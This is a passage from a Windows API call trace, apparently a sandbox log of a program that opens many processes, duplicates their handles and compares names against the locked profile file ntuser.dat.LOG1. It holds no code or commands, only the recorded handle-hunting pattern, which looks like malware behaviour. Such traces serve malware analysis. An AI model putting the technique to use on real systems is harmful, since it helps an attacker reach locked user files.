lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.629] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.630] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.630] CloseHandle (hObject=0x1e4) returned 1 [0161.630] _wcsicmp (_Str1="\\Microsoft Synchronization Services", _Str2="\\ntuser.dat.LOG1") returned -1 [0161.630] CloseHandle (hObject=0x194) returned 1 [0161.630] CloseHandle (hObject=0x1e8) returned 1 [0161.630] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x534) returned 0x1e8 [0161.630] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.630] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.631] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.632] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.632] CloseHandle (hObject=0x1e4) returned 1 [0161.632] _wcsicmp (_Str1="\\Windows", _Str2="\\ntuser.dat.LOG1") returned 9 [0161.632] CloseHandle (hObject=0x194) returned 1 [0161.632] CloseHandle (hObject=0x1e8) returned 1 [0161.632] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x534) returned 0x1e8 [0161.632] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.632] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.633] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.633] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.634] CloseHandle (hObject=0x1e4) returned 1 [0161.634] _wcsicmp (_Str1="\\Windows Mail", _Str2="\\ntuser.dat.LOG1") returned 9 [0161.634] CloseHandle (hObject=0x194) returned 1 [0161.634] CloseHandle (hObject=0x1e8) returned 1 [0161.634] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x70c) returned 0x1e8 [0161.634] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.634] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.635] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.635] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.636] CloseHandle (hObject=0x1e4) returned 1 [0161.636] _wcsicmp (_Str1="\\Windows", _Str2="\\ntuser.dat.LOG1") returned 9 [0161.636] CloseHandle (hObject=0x194) returned 1 [0161.636] CloseHandle (hObject=0x1e8) returned 1 [0161.636] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x70c) returned 0x1e8 [0161.636] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.636] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.636] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.637] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.637] CloseHandle (hObject=0x1e4) returned 1 [0161.637] _wcsicmp (_Str1="\\Windows NT", _Str2="\\ntuser.dat.LOG1") returned 9 [0161.637] CloseHandle (hObject=0x194) returned 1 [0161.637] CloseHandle (hObject=0x1e8) returned 1 [0161.637] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x290) returned 0x1e8 [0161.637] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.637] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.638] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.639] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.639] CloseHandle (hObject=0x1e4) returned 1 [0161.639] _wcsicmp (_Str1="\\Windows", _Str2="\\ntuser.dat.LOG1") returned 9 [0161.639] CloseHandle (hObject=0x194) returned 1 [0161.639] CloseHandle (hObject=0x1e8) returned 1 [0161.639] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x290) returned 0x1e8 [0161.639] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.639] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.640] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.641] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.641] CloseHandle (hObject=0x1e4) returned 1 [0161.641] _wcsicmp (_Str1="\\Windows Photo Viewer", _Str2="\\ntuser.dat.LOG1") returned 9 [0161.641] CloseHandle (hObject=0x194) returned 1 [0161.641] CloseHandle (hObject=0x1e8) returned 1 [0161.641] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x7b0) returned 0x1e8 [0161.641] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.642] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.642] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.643] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.643] CloseHandle (hObject=0x1e4) returned 1 [0161.643] _wcsicmp (_Str1="\\Windows", _Str2="\\ntuser.dat.LOG1") returned 9 [0161.643] CloseHandle (hObject=0x194) returned 1 [0161.643] CloseHandle (hObject=0x1e8) returned 1 [0161.643] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x7b0) returned 0x1e8 [0161.643] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.643] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.644] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.645] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.645] CloseHandle (hObject=0x1e4) returned 1 [0161.645] _wcsicmp (_Str1="\\Microsoft Analysis Services", _Str2="\\ntuser.dat.LOG1") returned -1 [0161.645] CloseHandle (hObject=0x194) returned 1 [0161.645] CloseHandle (hObject=0x1e8) returned 1 [0161.645] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x57c) returned 0x1e8 [0161.645] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.645] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.646] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.647] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.647] CloseHandle (hObject=0x1e4) returned 1 [0161.647] _wcsicmp (_Str1="\\Windows", _Str2="\\ntuser.dat.LOG1") returned 9 [0161.647] CloseHandle (hObject=0x194) returned 1 [0161.647] CloseHandle (hObject=0x1e8) returned 1 [0161.647] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x57c) returned 0x1e8 [0161.647] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.647] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.648] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.649] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.649] CloseHandle (hObject=0x1e4) returned 1 [0161.649] _wcsicmp (_Str1="\\Windows Sidebar", _Str2="\\ntuser.dat.LOG1") returned 9 [0161.649] CloseHandle (hObject=0x194) returned 1 [0161.649] CloseHandle (hObject=0x1e8) returned 1 [0161.649] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x780) returned 0x1e8 [0161.649] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.649] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.650] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.651] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.651] CloseHandle (hObject=0x1e4) returned 1 [0161.651] _wcsicmp (_Str1="\\Windows", _Str2="\\ntuser.dat.LOG1") returned 9 [0161.651] CloseHandle (hObject=0x194) returned 1 [0161.651] CloseHandle (hObject=0x1e8) returned 1 [0161.651] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x780) returned 0x1e8 [0161.651] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.651] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.652] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.653] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.653] CloseHandle (hObject=0x1e4) returned 1 [0161.653] _wcsicmp (_Str1="\\Common Files", _Str2="\\ntuser.dat.LOG1") returned -11 [0161.653] CloseHandle (hObject=0x194) returned 1 [0161.653] CloseHandle (hObject=0x1e8) returned 1 [0161.653] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x10c) returned 0x1e8 [0161.653] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.653] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.654] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.654] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.655] CloseHandle (hObject=0x1e4) returned 1 [0161.655] _wcsicmp (_Str1="\\Windows", _Str2="\\ntuser.dat.LOG1") returned 9 [0161.655] CloseHandle (hObject=0x194) returned 1 [0161.655] CloseHandle (hObject=0x1e8) returned 1 [0161.655] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x10c) returned 0x1e8 [0161.655] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.655] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.656] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.657] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.657] CloseHandle (hObject=0x1e4) returned 1 [0161.657] _wcsicmp (_Str1="\\Internet Explorer", _Str2="\\ntuser.dat.LOG1") returned -5 [0161.657] CloseHandle (hObject=0x194) returned 1 [0161.658] CloseHandle (hObject=0x1e8) returned 1 [0161.658] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x208) returned 0x1e8 [0161.658] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.658] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.659] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.660] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.660] CloseHandle (hObject=0x1e4) returned 1 [0161.660] _wcsicmp (_Str1="\\Windows", _Str2="\\ntuser.dat.LOG1") returned 9 [0161.660] CloseHandle (hObject=0x194) returned 1 [0161.660] CloseHandle (hObject=0x1e8) returned 1 [0161.660] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x208) returned 0x1e8 [0161.660] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.660] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.661] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.662] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.662] CloseHandle (hObject=0x1e4) returned 1 [0161.663] _wcsicmp (_Str1="\\Windows Mail", _Str2="\\ntuser.dat.LOG1") returned 9 [0161.663] CloseHandle (hObject=0x194) returned 1 [0161.663] CloseHandle (hObject=0x1e8) returned 1 [0161.663] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x7d4) returned 0x1e8 [0161.663] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.663] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.664] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.672] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.672] CloseHandle (hObject=0x1e4) returned 1 [0161.672] _wcsicmp (_Str1="\\Windows", _Str2="\\ntuser.dat.LOG1") returned 9 [0161.672] CloseHandle (hObject=0x194) returned 1 [0161.672] CloseHandle (hObject=0x1e8) returned 1 [0161.672] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x7d4) returned 0x1e8 [0161.672] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.672] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.673] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.674] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.674] CloseHandle (hObject=0x1e4) returned 1 [0161.674] _wcsicmp (_Str1="\\Microsoft Office", _Str2="\\ntuser.dat.LOG1") returned -1 [0161.674] CloseHandle (hObject=0x194) returned 1 [0161.674] CloseHandle (hObject=0x1e8) returned 1 [0161.674] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x798) returned 0x1e8 [0161.674] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.674] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.675] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.676] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.676] CloseHandle (hObject=0x1e4) returned 1 [0161.676] _wcsicmp (_Str1="\\Windows", _Str2="\\ntuser.dat.LOG1") returned 9 [0161.676] CloseHandle (hObject=0x194) returned 1 [0161.676] CloseHandle (hObject=0x1e8) returned 1 [0161.676] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x798) returned 0x1e8 [0161.676] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.676] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.677] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.678] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.678] CloseHandle (hObject=0x1e4) returned 1 [0161.678] _wcsicmp (_Str1="\\Microsoft.NET", _Str2="\\ntuser.dat.LOG1") returned -1 [0161.678] CloseHandle (hObject=0x194) returned 1 [0161.678] CloseHandle (hObject=0x1e8) returned 1 [0161.678] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x5dc) returned 0x1e8 [0161.678] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.679] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.679] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.680] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.680] CloseHandle (hObject=0x1e4) returned 1 [0161.680] _wcsicmp (_Str1="\\Windows", _Str2="\\ntuser.dat.LOG1") returned 9 [0161.680] CloseHandle (hObject=0x194) returned 1 [0161.680] CloseHandle (hObject=0x1e8) returned 1 [0161.680] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x5dc) returned 0x1e8 [0161.680] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.680] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.681] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.682] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.682] CloseHandle (hObject=0x1e4) returned 1 [0161.682] _wcsicmp (_Str1="\\Microsoft Analysis Services", _Str2="\\ntuser.dat.LOG1") returned -1 [0161.682] CloseHandle (hObject=0x194) returned 1 [0161.682] CloseHandle (hObject=0x1e8) returned 1 [0161.682] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x7c4) returned 0x1e8 [0161.682] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.682] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.683] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.683] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.683] CloseHandle (hObject=0x1e4) returned 1 [0161.684] _wcsicmp (_Str1="\\Windows", _Str2="\\ntuser.dat.LOG1") returned 9 [0161.684] CloseHandle (hObject=0x194) returned 1 [0161.684] CloseHandle (hObject=0x1e8) returned 1 [0161.684] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x7c4) returned 0x1e8 [0161.684] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.684] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.685] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.685] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.685] CloseHandle (hObject=0x1e4) returned 1 [0161.685] _wcsicmp (_Str1="\\Microsoft Analysis Services", _Str2="\\ntuser.dat.LOG1") returned -1 [0161.685] CloseHandle (hObject=0x194) returned 1 [0161.686] CloseHandle (hObject=0x1e8) returned 1 [0161.686] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x7d0) returned 0x1e8 [0161.686] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.686] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.686] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.687] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.687] CloseHandle (hObject=0x1e4) returned 1 [0161.687] _wcsicmp (_Str1="\\Windows", _Str2="\\ntuser.dat.LOG1") returned 9 [0161.687] CloseHandle (hObject=0x194) returned 1 [0161.687] CloseHandle (hObject=0x1e8) returned 1 [0161.687] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x7d0) returned 0x1e8 [0161.687] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.687] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.688] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.689] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.689] CloseHandle (hObject=0x1e4) returned 1 [0161.689] _wcsicmp (_Str1="\\Windows NT", _Str2="\\ntuser.dat.LOG1") returned 9 [0161.689] CloseHandle (hObject=0x194) returned 1 [0161.689] CloseHandle (hObject=0x1e8) returned 1 [0161.689] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, 